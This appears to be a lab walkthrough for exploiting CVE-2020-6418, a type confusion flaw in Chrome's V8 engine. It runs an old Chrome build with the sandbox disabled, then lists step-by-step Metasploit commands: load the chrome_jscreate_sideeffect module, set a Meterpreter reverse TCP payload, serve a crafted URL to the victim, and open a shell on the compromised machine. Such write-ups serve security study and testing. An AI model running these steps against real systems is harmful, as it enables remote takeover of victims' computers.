The CVE 2020-6418 is about the the type confusion in V8 in Google chrome.The affected versions were prior to 80.0.3987.122. The vulnerability is achived by remote attacker accessing the shell of a target device via a crafted HTML page.
- Google Chrome with version prior to 80.0.3987.122 .
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
- Metasploit Framework
- OS : Any
- Google Chrome Version v80.0.3987.87
https://www.neowin.net/news/google-chrome-800398787-offline-installer/ - Windows v11
- Kali Linux v2021.1
i) Create a short-cut for Google chrome
ii) Click on the properities > go to option called "Target"
iii) At the end of EXE , give space and enter -no--sandbox
iv) Click Apply > Ok
v) Open new browser Google Chrome and you will find the pop-up stating the below.
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer
nosandbox.mp4
Since we are using Kali as an enviroment to carry out the exploit , metasploit comes as a built-in tool with the distro. But if you are using other distros we need to set up metaspolit before we begin the exploit.
Refer to the Metasploit installation for further understanding.
i) Starting metasploit framework
> msfconsole
ii) Find the exploit
> search chrome_js
iii) Use the available exploit from the above output
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Provide SRVHOST IP address
> set SRVHOST <ip address>
v) Provide Target Here we get two options
- Target 0 : For Windows
- Target 1 : For MAC
> set Target " Number "
vi) Provide Payload
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) To check the current settings and options enabled.
> show options
viii) To run the exploit
> run (or) > exploit
ix) You will be proivded with an URL , which should be copied on the browser for the session to get active.
x) Once the user accesses the URL , a session will be created. To check this
> show sessions
xi) Using the session , we can check the user system info / enter the shell.
> sessions <number>
> shell